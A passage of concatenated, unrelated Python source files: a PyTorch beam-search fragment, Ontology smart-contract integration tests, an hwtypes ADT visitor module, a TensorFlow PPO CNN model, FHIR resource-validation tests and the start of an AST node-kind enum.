            # tensors in modern PyTorch, yielding a float tensor that
            # torch.gather rejects as an index; use floor division.
            beam_idx = idx_flat // self.num_labels
            preds = idx_flat % self.num_labels
            beam_idx_exp = beam_idx.unsqueeze(-1).expand(-1, -1, x.size(-1))
            x_indexed = torch.gather(x, 1, beam_idx_exp)
            x = torch.cat([x_indexed, preds.unsqueeze(-1)], 2)
            # write-back original logprobs for out-of-length items
            if self.mask is not None:
                # renamed from `mask` to avoid shadowing the module-level helper
                mask_t = self.mask[:, t].float()
                old_logprobs = torch.gather(cum_logprobs, 1, beam_idx)
                new_logprobs = new_logprobs_flat * mask_t.unsqueeze(-1) + \
                    old_logprobs * (1 - mask_t.unsqueeze(-1))
            else:
                new_logprobs = new_logprobs_flat
            cum_logprobs = new_logprobs
        return x, cum_logprobs
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import binascii
import os
import json
import time
import unittest
from ontology.ont_sdk import OntologySdk
from ontology.utils.contract_data_parser import ContractDataParser
from ontology.utils.contract_event_parser import ContractEventParser
from ontology.wallet.wallet_manager import WalletManager
from src.invoke_hello_ontology import InvokeHelloPython
# --- Module-level fixtures (run once at import time; they open a wallet on
# disk and point the SDK at a public test-net node) ---
ontology = OntologySdk()
# Public Polaris test-net RPC endpoint.
remote_rpc_address = 'http://polaris3.ont.io:20336'
ontology.set_rpc(remote_rpc_address)
root_folder = os.path.dirname(os.path.dirname(__file__))
wallet_path = os.path.join(root_folder, 'wallet', 'wallet.json')
contracts_folder = os.path.join(root_folder, 'contracts')
# Hex address of the deployed HelloOntology contract under test.
hex_contract_address = '6fa374c57ea53680f5733d789a4f03b0ea45d82e'
gas_limit = 20000000
gas_price = 500
wallet_manager = WalletManager()
wallet_manager.open_wallet(wallet_path)
# password = input('password: ')
password = 'password'
# NOTE(review): '<KEY>' looks like a redacted account address — restore the
# real base58 address from wallet.json before running these tests.
acct = wallet_manager.get_account('<KEY>', password)
hello_ontology = InvokeHelloPython(ontology, hex_contract_address)
class TestHelloOntology(unittest.TestCase):
    """Integration tests for the HelloOntology contract wrapper.

    NOTE(review): these tests talk to a public test-net RPC node and spend
    gas from the module-level account; they require network access and a
    funded wallet, so they are integration tests rather than unit tests.
    """

    def test_name(self):
        """The contract's name() query returns the literal string 'name'."""
        response = hello_ontology.name()
        self.assertEqual('name', response)

    def test_hello(self):
        """hello() echoes back the message passed in."""
        msg = 'ontology'
        response = hello_ontology.hello(msg)
        self.assertEqual(msg, response)

    def test_test_hello(self):
        """testHello round-trips bool/int/bytes/str/address through an event."""
        bool_msg = True
        int_msg = 1
        bytes_msg = b'Hello'
        str_msg = 'Hello'
        address_msg = acct.get_address().to_bytes()
        tx_hash = hello_ontology.test_hello(bool_msg, int_msg, bytes_msg, str_msg, address_msg, acct, gas_limit,
                                            gas_price)
        # Wait for the transaction to be processed before querying its event.
        time.sleep(6)
        event = ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash)
        states = ContractEventParser.get_states_by_contract_address(event, hex_contract_address)
        # states[0] is the event name; the remaining entries mirror the args.
        states[0] = ContractDataParser.to_utf8_str(states[0])
        self.assertEqual('testHello', states[0])
        states[1] = ContractDataParser.to_bool(states[1])
        self.assertEqual(bool_msg, states[1])
        states[2] = ContractDataParser.to_int(states[2])
        self.assertEqual(int_msg, states[2])
        states[3] = ContractDataParser.to_bytes(states[3])
        self.assertEqual(bytes_msg, states[3])
        states[4] = ContractDataParser.to_utf8_str(states[4])
        self.assertEqual(str_msg, states[4])
        states[5] = ContractDataParser.to_b58_address(states[5])
        self.assertEqual(acct.get_address_base58(), states[5])

    def test_test_list_and_str(self):
        """A list argument survives the round trip through the event log."""
        list_msg = [1, 2, 3]
        tx_hash = hello_ontology.test_list(list_msg, acct, gas_limit, gas_price)
        time.sleep(6)
        event = ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash)
        states = ContractEventParser.get_states_by_contract_address(event, hex_contract_address)
        states[0] = ContractDataParser.to_utf8_str(states[0])
        self.assertEqual('testMsgList', states[0])
        states[1] = ContractDataParser.to_int_list(states[1])
        self.assertEqual(list_msg, states[1])

    def test_test_dict_pre_exec(self):
        """Pre-execution (no tx) of a dict lookup returns the stored value."""
        dict_msg = {'key': 'value'}
        dict_value = hello_ontology.test_dict_pre_exec(dict_msg)
        dict_value = ContractDataParser.to_utf8_str(dict_value)
        self.assertEqual('value', dict_value)

    def test_test_dict(self):
        """Sending a dict in a real transaction yields a 64-hex-char tx hash."""
        dict_msg = {'key': 'value'}
        tx_hash = hello_ontology.test_dict(dict_msg, acct, gas_limit, gas_price)
        self.assertEqual(64, len(tx_hash))

    def test_test_get_dict(self):
        """Reading back the dict entry stored by test_test_dict."""
        key = 'key'
        value = hello_ontology.test_get_dict(key)
        value = ContractDataParser.to_utf8_str(value)
        self.assertEqual('value', value)

    def test_test_struct_list_and_str_pre_exec(self):
        """Pre-execution round trip of a mixed struct list plus a string."""
        bool_msg = True
        int_msg = 10
        bytes_msg = b'Hello'
        str_msg = 'Hello'
        list_msg = [1, 10, 1024, [1, 10, 1024, [1, 10, 1024]]]
        struct_list = [bool_msg, int_msg, bytes_msg, str_msg, list_msg]
        value = hello_ontology.test_struct_list_and_str_pre_exec(struct_list, str_msg)
        # value[0] mirrors struct_list field by field; value[1] mirrors str_msg.
        value[0][0] = ContractDataParser.to_bool(value[0][0])
        self.assertEqual(bool_msg, value[0][0])
        value[0][1] = ContractDataParser.to_int(value[0][1])
        self.assertEqual(int_msg, value[0][1])
        value[0][2] = ContractDataParser.to_bytes(value[0][2])
        self.assertEqual(bytes_msg, value[0][2])
        value[0][3] = ContractDataParser.to_utf8_str(value[0][3])
        self.assertEqual(str_msg, value[0][3])
        value[0][4] = ContractDataParser.to_int_list(value[0][4])
        self.assertEqual(list_msg, value[0][4])
        value[1] = ContractDataParser.to_utf8_str(value[1])
        self.assertEqual(str_msg, value[1])

    def test_test_struct_list_and_str(self):
        """Same struct round trip as above, but via a real transaction event."""
        bool_msg = True
        int_msg = 10
        bytes_msg = b'Hello'
        str_msg = 'Hello'
        list_msg = [1, 10, 1024, [1, 10, 1024, [1, 10, 1024]]]
        struct_list = [bool_msg, int_msg, bytes_msg, str_msg, list_msg]
        tx_hash = hello_ontology.test_struct_list_and_str(struct_list, str_msg, acct, gas_limit, gas_price)
        time.sleep(6)
        event = ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash)
        states = ContractEventParser.get_states_by_contract_address(event, hex_contract_address)
        states[0] = ContractDataParser.to_utf8_str(states[0])
        states[1][0] = ContractDataParser.to_bool(states[1][0])
        self.assertEqual(bool_msg, states[1][0])
        states[1][1] = ContractDataParser.to_int(states[1][1])
        self.assertEqual(int_msg, states[1][1])
        states[1][2] = ContractDataParser.to_bytes(states[1][2])
        self.assertEqual(bytes_msg, states[1][2])
        states[1][3] = ContractDataParser.to_utf8_str(states[1][3])
        self.assertEqual(str_msg, states[1][3])
        states[1][4] = ContractDataParser.to_int_list(states[1][4])
        self.assertEqual(list_msg, states[1][4])
        states[2] = ContractDataParser.to_utf8_str(states[2])

    def test_test_dict_in_ctx(self):
        """A nested dict stored via storage context emits a 'mapInfo' event."""
        bool_value = True
        int_value = 100
        str_value = 'value3'
        dict_value = {'key': 'value'}
        list_value = [1, 10, 1024, [1, 10, 1024, [1, 10, 1024]]]
        dict_msg = {'key': dict_value, 'key1': int_value, 'key2': str_value, 'key3': bool_value, 'key4': list_value}
        tx_hash = hello_ontology.test_dict_in_ctx(dict_msg, acct, gas_limit, gas_price)
        time.sleep(6)
        event = ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash)
        states = ContractEventParser.get_states_by_contract_address(event, hex_contract_address)
        states[0] = ContractDataParser.to_utf8_str(states[0])
        self.assertEqual('mapInfo', states[0])
        states[1] = ContractDataParser.to_dict(states[1])
        self.assertTrue(isinstance(states[1], dict))

    def test_test_get_dict_in_ctx(self):
        """Reading back the context-stored dict entry."""
        key = 'key'
        value = hello_ontology.test_get_dict_in_ctx(key)
        value = ContractDataParser.to_utf8_str(value)
        self.assertEqual('value', value)

    def test_test_transfer_multi(self):
        """A multi-transfer transaction executes successfully (State == 1)."""
        bytes_address = acct.get_address().to_bytes()
        # Each transfer is [from, to, amount]; self-transfers keep the test cheap.
        transfer1 = [bytes_address, bytes_address, 1]
        transfer2 = [bytes_address, bytes_address, 2]
        transfer_list = [transfer1, transfer2]
        tx_hash = hello_ontology.test_transfer_multi(transfer_list, acct, gas_limit, gas_price)
        time.sleep(6)
        event = ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash)
        self.assertEqual(1, event['State'])
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
from abc import ABCMeta, abstractmethod
from .adt_meta import BoundMeta
from .bit_vector_abc import AbstractBitVectorMeta, AbstractBitVector, AbstractBit
from .util import _issubclass
from hwtypes.modifiers import unwrap_modifier, wrap_modifier, is_modified
from .adt import Product, Sum, Tuple, Enum, TaggedUnion
from inspect import isclass
class _ADTVisitor(metaclass=ABCMeta):
    """Shared dispatch logic for ADT visitors.

    Subclasses supply ``check_t`` (a two-argument predicate such as
    ``issubclass`` or ``isinstance``) and ``generic_visit``; ``visit``
    routes each node to the matching ``visit_*`` hook.
    """

    def visit(self, adt_t):
        # The order here is important because Product < Tuple
        # and TaggedUnion < Sum
        if self.check_t(adt_t, Enum):
            self.visit_Enum(adt_t)
        elif self.check_t(adt_t, Product):
            self.visit_Product(adt_t)
        elif self.check_t(adt_t, Tuple):
            self.visit_Tuple(adt_t)
        elif self.check_t(adt_t, TaggedUnion):
            self.visit_TaggedUnion(adt_t)
        elif self.check_t(adt_t, Sum):
            self.visit_Sum(adt_t)
        else:
            self.visit_leaf(adt_t)

    @abstractmethod
    def check_t(self, adt_t, T): pass  # signature now matches the call sites above

    @abstractmethod
    def generic_visit(self, adt_t): pass

    def visit_leaf(self, adt_t):
        # BUG FIX: `visit` dispatches to `visit_leaf`, but only `visit_Leaf`
        # existed, so visiting any leaf raised AttributeError.  Delegating
        # keeps both spellings working as override points.
        self.visit_Leaf(adt_t)

    def visit_Leaf(self, adt_t): pass

    def visit_Enum(self, adt_t): pass

    def visit_Product(self, adt_t):
        self.generic_visit(adt_t)

    def visit_Tuple(self, adt_t):
        self.generic_visit(adt_t)

    def visit_TaggedUnion(self, adt_t):
        self.generic_visit(adt_t)

    def visit_Sum(self, adt_t):
        self.generic_visit(adt_t)
class ADTVisitor(_ADTVisitor):
    """Visitor over ADT *types*: recursion follows ``field_dict`` values."""

    check_t = staticmethod(_issubclass)

    def generic_visit(self, adt_t):
        for field_t in adt_t.field_dict.values():
            self.visit(field_t)
class ADTInstVisitor(_ADTVisitor):
    """Visitor over ADT *instances*: recursion follows ``value_dict``."""

    check_t = staticmethod(isinstance)

    def generic_visit(self, adt):
        for value in adt.value_dict.values():
            if value is None:
                # Unset variants (e.g. inactive Sum members) carry None.
                continue
            self.visit(value)
def rebind_bitvector(
        adt,
        bv_type_0: AbstractBitVectorMeta,
        bv_type_1: AbstractBitVectorMeta,
        keep_modifiers=False):
    """Recursively replace occurrences of ``bv_type_0`` with ``bv_type_1``.

    Sized bitvectors keep their width; bound (composite) ADTs are rebuilt
    field by field; anything else is returned untouched.  When
    ``keep_modifiers`` is set, modified types are unwrapped, rebound, and
    re-wrapped with the same modifiers.
    """
    if keep_modifiers and is_modified(adt):
        unmod, mods = unwrap_modifier(adt)
        rebound = rebind_bitvector(unmod, bv_type_0, bv_type_1, True)
        return wrap_modifier(rebound, mods)
    if _issubclass(adt, bv_type_0):
        return bv_type_1[adt.size] if adt.is_sized else bv_type_1
    if isinstance(adt, BoundMeta):
        new_adt = adt
        for field in adt.fields:
            replacement = rebind_bitvector(field, bv_type_0, bv_type_1, keep_modifiers)
            new_adt = new_adt.rebind(field, replacement, rebind_recursive=False)
        return new_adt
    return adt
def rebind_keep_modifiers(adt, A, B):
    """Recursively replace subclasses of ``A`` with ``B``, preserving modifiers."""
    if is_modified(adt):
        unmod, mods = unwrap_modifier(adt)
        return wrap_modifier(rebind_keep_modifiers(unmod, A, B), mods)
    if _issubclass(adt, A):
        return B
    if isinstance(adt, BoundMeta):
        result = adt
        for field in adt.fields:
            result = result.rebind(field, rebind_keep_modifiers(field, A, B))
        return result
    return adt
# rebind_type rebinds a type to a different family.
# Types that will be rebound:
#   Product, Tuple, Sum, BitVector, Bit
#   Modified types
# If the passed-in type cannot be rebound, it is returned unmodified.
def rebind_type(T, family):
    """Rebind ``T`` into ``family`` (Bit, BitVector, and composite ADTs).

    Non-class and unrecognized values are returned unchanged.
    """
    def _rebind_bv(T):
        # Composite ADTs need both their BitVector and Bit leaves rebound.
        return rebind_bitvector(T, AbstractBitVector, family.BitVector).rebind(AbstractBit, family.Bit, True)

    if not isclass(T):
        return T
    elif is_modified(T):
        # BUG FIX: this branch referenced undefined names (get_modifier,
        # get_unmodified, dont_rebind, do_rebind, is_magma) and raised
        # NameError; unwrap the modifier, rebind, and re-wrap, mirroring
        # rebind_keep_modifiers above.
        unmod, mods = unwrap_modifier(T)
        return wrap_modifier(rebind_type(unmod, family), mods)
    elif issubclass(T, AbstractBitVector):
        return rebind_bitvector(T, AbstractBitVector, family.BitVector)
    elif issubclass(T, AbstractBit):
        return family.Bit
    elif issubclass(T, (Product, Tuple, Sum)):
        return _rebind_bv(T)
    else:
        return T
|
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import time
import numpy as np
import tensorflow as tf
from xt.model.tf_compat import K, Conv2D, Dense, \
Flatten, Input, Lambda, Model, Activation
from xt.model.ppo.ppo_cnn_tf import PPOCnnTf, layer_function
from xt.model.ppo.default_config import LR, LOSS_CLIPPING, ENTROPY_LOSS, BATCH_SIZE
from xt.util.common import import_config
from xt.framework.register import Registers
@Registers.model
class PPOCnnTfSmall(PPOCnnTf):
    """Small CNN actor-critic network for PPO over image observations.

    Builds a 3-conv + dense torso with softmax policy and scalar value
    heads, then wires a TF1 training graph with clipped PPO losses.
    """

    def __init__(self, model_info):
        model_config = model_info.get('model_config', None)
        # Overlays hyper-parameters (LR, BATCH_SIZE, ...) onto module globals.
        import_config(globals(), model_config)
        self.state_dim = model_info['state_dim']
        self.action_dim = model_info['action_dim']
        super().__init__(model_info)

    def create_model(self, model_info):
        """Build the Keras forward model and the TF training graph."""
        state_input = Input(shape=self.state_dim, name='state_input', dtype='uint8')
        # layer_function presumably casts uint8 frames to float32 and rescales
        # (see ppo_cnn_tf) — confirm against PPOCnnTf.
        state_input_1 = Lambda(layer_function)(state_input)
        convlayer = Conv2D(32, (8, 8), strides=(4, 4), activation='relu', padding='valid')(state_input_1)
        convlayer = Conv2D(32, (4, 4), strides=(2, 2), activation='relu', padding='valid')(convlayer)
        convlayer = Conv2D(64, (3, 3), strides=(1, 1), activation='relu', padding='valid')(convlayer)
        flattenlayer = Flatten()(convlayer)
        denselayer = Dense(256, activation='relu', name='dense_1')(flattenlayer)
        out_actions = Dense(self.action_dim, activation='softmax', name='output_actions_raw')(denselayer)
        out_value = Dense(1, name='output_value')(denselayer)
        model = Model(inputs=[state_input], outputs=[out_actions, out_value])
        self.build_graph(np.uint8, model)
        return model

    def build_graph(self, intput_type, model):
        """Create placeholders, losses, and the clipped-gradient train op."""
        # pylint: disable=W0201
        self.infer_state = tf.placeholder(intput_type, name="infer_input",
                                          shape=(None, ) + tuple(self.state_dim))
        self.state = tf.placeholder(intput_type, name="input",
                                    shape=(None, ) + tuple(self.state_dim))
        self.adv = tf.placeholder(tf.float32, name="adv",
                                  shape=(None, 1))
        self.old_p = tf.placeholder(tf.float32, name="old_p",
                                    shape=(None, self.action_dim))
        self.old_v = tf.placeholder(tf.float32, name="old_v",
                                    shape=(None, 1))
        self.out_p, self.out_v = model(self.state)
        self.infer_p, self.infer_v = model(self.infer_state)
        self.target_v = tf.placeholder(tf.float32, name="target_value",
                                       shape=(None, 1))
        self.target_p = tf.placeholder(tf.float32, name="target_policy",
                                       shape=(None, self.action_dim))
        loss = 0.5 * value_loss(self.target_v, self.out_v, self.old_v)
        loss += ppo_loss(self.adv, self.old_p, self.target_p, self.out_p)
        self.loss = loss
        self.trainer = tf.train.AdamOptimizer(learning_rate=LR, epsilon=1e-5)
        # Clip gradients by global norm before applying them.
        grads_and_var = self.trainer.compute_gradients(loss)
        grads, var = zip(*grads_and_var)
        max_grad_norm = 0.5
        grads, _grad_norm = tf.clip_by_global_norm(grads, max_grad_norm)
        grads_and_var = list(zip(grads, var))
        self.train_op = self.trainer.apply_gradients(grads_and_var)
        # BUG FIX: tf.initialize_all_variables() was removed from TensorFlow;
        # tf.global_variables_initializer() is the supported TF1 equivalent.
        self.sess.run(tf.global_variables_initializer())

    def train(self, state, label):
        """Run 4 epochs of minibatch PPO updates; return the mean loss.

        `state` is (obs, adv, old_p, old_v); `label` is (target_p, target_v).
        """
        with self.graph.as_default():
            K.set_session(self.sess)
            nbatch_train = BATCH_SIZE
            # Truncate to a whole number of minibatches (at least one sample).
            nbatch = max((state[0].shape[0] // nbatch_train) * nbatch_train, 1)
            inds = np.arange(nbatch)
            loss_val = []
            start_time = time.time()
            for _ in range(4):
                # Randomize the indexes
                np.random.shuffle(inds)
                # 0 to batch_size with batch_train_size step
                for start in range(0, nbatch, nbatch_train):
                    end = start + nbatch_train
                    mbinds = inds[start:end]
                    feed_dict = {self.state: state[0][mbinds],
                                 self.adv: state[1][mbinds],
                                 self.old_p: state[2][mbinds],
                                 self.old_v: state[3][mbinds],
                                 self.target_p: label[0][mbinds],
                                 self.target_v: label[1][mbinds],}
                    ret_value = self.sess.run([self.train_op, self.loss], feed_dict)
                    loss_val.append(np.mean(ret_value[1]))
            return np.mean(loss_val)

    def predict(self, state):
        """Run inference with the newest model.

        :param state: batch of observations matching `state_dim`.
        :return: [policy probabilities, value estimates].
        """
        with self.graph.as_default():
            K.set_session(self.sess)
            feed_dict = {self.infer_state: state}
            return self.sess.run([self.infer_p, self.infer_v], feed_dict)
def value_loss(target_v, out_v, old_v):
    """PPO2-style clipped value loss.

    Takes the element-wise max of the clipped and unclipped squared errors so
    the value head cannot move too far from its previous prediction.
    """
    clipped_pred = old_v + tf.clip_by_value(out_v - old_v, -LOSS_CLIPPING, LOSS_CLIPPING)
    unclipped_err = tf.square(out_v - target_v)
    clipped_err = tf.square(clipped_pred - target_v)
    return .5 * tf.reduce_mean(tf.maximum(unclipped_err, clipped_err))
def ppo_loss(adv, old_p, target_p, out_p):
    """Clipped-surrogate PPO policy loss with an entropy bonus."""
    # Per-action cross-entropies under the new and old policies.
    cross_ent_new = -target_p * tf.log(out_p + 1e-10)
    cross_ent_old = -target_p * tf.log(old_p + 1e-10)
    ratio = tf.exp(cross_ent_old - cross_ent_new)
    surrogate = -adv * ratio
    surrogate_clipped = -adv * tf.clip_by_value(ratio, 1.0 - LOSS_CLIPPING, 1.0 + LOSS_CLIPPING)
    policy_loss = tf.reduce_mean(tf.maximum(surrogate, surrogate_clipped))
    entropy = tf.reduce_mean(-out_p * tf.log(out_p + 1e-10))
    return policy_loss - ENTROPY_LOSS * entropy
|
<reponame>swrobel/fhir<filename>py/google/fhir/r4/resource_validation_test.py
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test resource validation functionality."""
import os
from typing import Type
from google.protobuf import message
from absl.testing import absltest
from proto.google.fhir.proto.r4.core.resources import bundle_and_contained_resource_pb2
from proto.google.fhir.proto.r4.core.resources import encounter_pb2
from proto.google.fhir.proto.r4.core.resources import observation_pb2
from google.fhir import fhir_errors
from google.fhir.r4 import resource_validation
from google.fhir.testing import testdata_utils
_VALIDATION_DIR = os.path.join('testdata', 'r4', 'validation')
class ResourceValidationTest(absltest.TestCase):
  """Basic unit test suite ensuring that resource validation works correctly."""

  def testResourceValidation_withMissingRequiredField_raises(self):
    self._invalid_test('observation_invalid_missing_required',
                       observation_pb2.Observation)

  def testResourceValidation_withInvalidPrimitive_raises(self):
    self._invalid_test('observation_invalid_primitive',
                       observation_pb2.Observation)

  def testResourceValidation_withValidReference_succeeds(self):
    self._valid_test('observation_valid_reference', observation_pb2.Observation)

  def testResourceValidation_withInvalidReference_raises(self):
    self._invalid_test('observation_invalid_reference',
                       observation_pb2.Observation)

  # TODO: Implement FHIR-Path validation for Python API
  # def testResourceValidation_withFhirPathViolation_raises(self):
  #   self._invalid_test('observation_invalid_fhirpath_violation',
  #                      observation_pb2.Observation)

  def testResourceValidation_withValidRepeatedReference_succeeds(self):
    self._valid_test('encounter_valid_repeated_reference',
                     encounter_pb2.Encounter)

  # FIX: renamed from ..._raies (typo) to match the suite's naming convention;
  # discovery is prefix-based, so the rename is safe.
  def testResourceValidation_withInvalidRepeatedReference_raises(self):
    self._invalid_test('encounter_invalid_repeated_reference',
                       encounter_pb2.Encounter)

  # FIX: renamed from ..._Raises for consistent lower-case suffix style.
  def testResourceValidation_withInvalidEmptyOneof_raises(self):
    self._invalid_test('observation_invalid_empty_oneof',
                       observation_pb2.Observation)

  def testResourceValidation_withValidBundle_succeeds(self):
    self._valid_test('bundle_valid', bundle_and_contained_resource_pb2.Bundle)

  def testResourceValidation_withStartLaterThanEnd_raises(self):
    self._invalid_test('encounter_invalid_start_later_than_end',
                       encounter_pb2.Encounter)

  def testResourceValidation_withStartLaterThanEndWithEndPrecision_succeeds(
      self):
    self._valid_test('encounter_valid_start_later_than_end_day_precision',
                     encounter_pb2.Encounter)

  def testResourceValidation_withValidEncounter_succeeds(self):
    self._valid_test('encounter_valid', encounter_pb2.Encounter)

  def testResourceValidation_withValidNumericTimezone_succeeds(self):
    self._valid_test('encounter_valid_numeric_timezone',
                     encounter_pb2.Encounter)

  def _valid_test(self, name: str, message_cls: Type[message.Message]) -> None:
    """Assert that the named prototxt fixture validates cleanly."""
    msg = testdata_utils.read_protos(
        os.path.join(_VALIDATION_DIR, name + '.prototxt'), message_cls)[0]
    resource_validation.validate_resource(msg)

  def _invalid_test(self, name: str,
                    message_cls: Type[message.Message]) -> None:
    """Assert that validating the named fixture raises InvalidFhirError."""
    msg = testdata_utils.read_protos(
        os.path.join(_VALIDATION_DIR, name + '.prototxt'), message_cls)[0]
    with self.assertRaises(fhir_errors.InvalidFhirError) as fe:
      resource_validation.validate_resource(msg)
    self.assertIsInstance(fe.exception, fhir_errors.InvalidFhirError)
# Allow running this test module directly.
if __name__ == '__main__':
  absltest.main()
|
from enum import IntEnum, auto
from typing import Tuple
# Public API: the NodeKind enum plus NK_* aliases and grouping tuples.
# NOTE(review): 'NK_DECLARARIONS' is misspelled but matches the variable
# actually defined below; renaming it here alone would break the export.
__all__ = [
    'NodeKind',
    'NK_NONE',
    'NK_BOOL_EXPR',
    'NK_INT8_EXPR',
    'NK_INT16_EXPR',
    'NK_INT32_EXPR',
    'NK_INT64_EXPR',
    'NK_UINT8_EXPR',
    'NK_UINT16_EXPR',
    'NK_UINT32_EXPR',
    'NK_UINT64_EXPR',
    'NK_FLOAT16_EXPR',
    'NK_FLOAT32_EXPR',
    'NK_FLOAT64_EXPR',
    'NK_FLOAT80_EXPR',
    'NK_NULL_EXPR',
    'NK_UNDEFINED_EXPR',
    'NK_FUNCTION_EXPR',
    'NK_FCALL_EXPR',
    'NK_VAR_EXPR',
    'NK_CONSTANT_EXPR',
    'NK_ENUMERATION_EXPR',
    'NK_CONSTEXPR_EXPR',
    'NK_PARAM_EXPR',
    'NK_OPERAND_EXPR',
    'NK_UNARY_EXPR',
    'NK_INC_EXPR',
    'NK_DEC_EXPR',
    'NK_BINARY_EXPR',
    'NK_TERNARY_EXPR',
    'NK_LOGIC_EXPR',
    'NK_COMPARISON_EXPR',
    'NK_EXPR',
    'NK_NAME',
    'NK_FUNCTION_DECL',
    'NK_VAR_DECL',
    'NK_CONSTANT_DECL',
    'NK_ENUMERATION_DECL',
    'NK_PARAM_DECL',
    'NK_ASSIGN_STMT',
    'NK_INC_STMT',
    'NK_DEC_STMT',
    'NK_PRINT_STMT',
    'NK_RETURN_STMT',
    'NK_IF_THEN_STMT',
    'NK_IF_ELSE_STMT',
    'NK_WHILE_STMT',
    'NK_DO_WHILE_STMT',
    'NK_DO_UNTIL_STMT',
    'NK_FOR_STMT',
    'NK_FOR_IN_STMT',
    'NK_FOR_OF_STMT',
    'NK_REPEAT_FINITE_STMT',
    'NK_REPEAT_INFINITE_STMT',
    'NK_BREAK_STMT',
    'NK_CONTINUE_STMT',
    'NK_STMT',
    'NK_BLOCK',
    'NK_MODULE_ASM',
    'NK_SHARED_ASM',
    'NK_MODULE_SCOPE',
    'NK_FUNCTION_SCOPE',
    'NK_CLASS_SCOPE',
    'NK_METHOD_SCOPE',
    'NK_STATEMENT_SCOPE',
    'NK_LOOP_SCOPE',
    'NK_CASE_SCOPE',
    'NK_PRIMITIVE_TYPE',
    'NK_ENUMERATION_TYPE',
    'NK_POINTER_TYPE',
    'NK_ARRAY_TYPE',
    'NK_FUNCTION_TYPE',
    'NK_SIGNATURE_TYPE',
    'NK_INTERFACE_TYPE',
    'NK_STRUCTURE_TYPE',
    'NK_CLASS_TYPE',
    'NK_TYPE',
    'NK_SIGNED_EXPR',
    'NK_UNSIGNED_EXPR',
    'NK_INTEGER_EXPR',
    'NK_FLOAT_EXPR',
    'NK_TYPES',
    'NK_SCOPES',
    'NK_LITERALS',
    'NK_STATEMENTS',
    'NK_EXPRESSIONS',
    'NK_DECLARARIONS',
]
# ---------------------------------------------------------
# region CONSTANTS & ENUMS
class NodeKind(IntEnum):
    """Discriminator for every AST node category.

    ``auto()`` assigns consecutive integers starting at 1, so member order
    determines numeric values — do not reorder members.
    """
    NONE = auto()
    # NOTE(review): INT8_EXPR precedes BOOL_EXPR here, unlike the __all__
    # listing; the order only affects the numeric values.
    INT8_EXPR = auto()
    BOOL_EXPR = auto()
    INT16_EXPR = auto()
    INT32_EXPR = auto()
    INT64_EXPR = auto()
    UINT8_EXPR = auto()
    UINT16_EXPR = auto()
    UINT32_EXPR = auto()
    UINT64_EXPR = auto()
    FLOAT16_EXPR = auto()
    FLOAT32_EXPR = auto()
    FLOAT64_EXPR = auto()
    FLOAT80_EXPR = auto()
    NULL_EXPR = auto()
    UNDEFINED_EXPR = auto()
    FUNCTION_EXPR = auto()
    FCALL_EXPR = auto()
    VAR_EXPR = auto()
    CONSTANT_EXPR = auto()
    ENUMERATION_EXPR = auto()
    CONSTEXPR_EXPR = auto()
    PARAM_EXPR = auto()
    OPERAND_EXPR = auto()
    UNARY_EXPR = auto()
    INC_EXPR = auto()
    DEC_EXPR = auto()
    BINARY_EXPR = auto()
    TERNARY_EXPR = auto()
    LOGIC_EXPR = auto()
    # NOTE(review): misspelling kept for compatibility — the correctly
    # spelled public name is exposed via the NK_COMPARISON_EXPR alias.
    COMPARISSON_EXPR = auto()
    EXPR = auto()
    NAME = auto()
    FUNCTION_DECL = auto()
    VAR_DECL = auto()
    CONSTANT_DECL = auto()
    ENUMERATION_DECL = auto()
    PARAM_DECL = auto()
    ASSIGN_STMT = auto()
    INC_STMT = auto()
    DEC_STMT = auto()
    PRINT_STMT = auto()
    RETURN_STMT = auto()
    IF_THEN_STMT = auto()
    IF_ELSE_STMT = auto()
    WHILE_STMT = auto()
    DO_WHILE_STMT = auto()
    DO_UNTIL_STMT = auto()
    FOR_STMT = auto()
    FOR_IN_STMT = auto()
    FOR_OF_STMT = auto()
    REPEAT_FINITE_STMT = auto()
    REPEAT_INFINITE_STMT = auto()
    BREAK_STMT = auto()
    CONTINUE_STMT = auto()
    STMT = auto()
    BLOCK = auto()
    MODULE_ASM = auto()
    SHARED_ASM = auto()
    MODULE_SCOPE = auto()
    FUNCTION_SCOPE = auto()
    CLASS_SCOPE = auto()
    METHOD_SCOPE = auto()
    STATEMENT_SCOPE = auto()
    LOOP_SCOPE = auto()
    CASE_SCOPE = auto()
    PRIMITIVE_TYPE = auto()
    ENUMERATION_TYPE = auto()
    POINTER_TYPE = auto()
    ARRAY_TYPE = auto()
    FUNCTION_TYPE = auto()
    SIGNATURE_TYPE = auto()
    INTERFACE_TYPE = auto()
    STRUCTURE_TYPE = auto()
    CLASS_TYPE = auto()
    TYPE = auto()
# Module-level aliases so callers can write NK_FOO instead of NodeKind.FOO.
NK_NONE = NodeKind.NONE
NK_INT8_EXPR = NodeKind.INT8_EXPR
NK_BOOL_EXPR = NodeKind.BOOL_EXPR
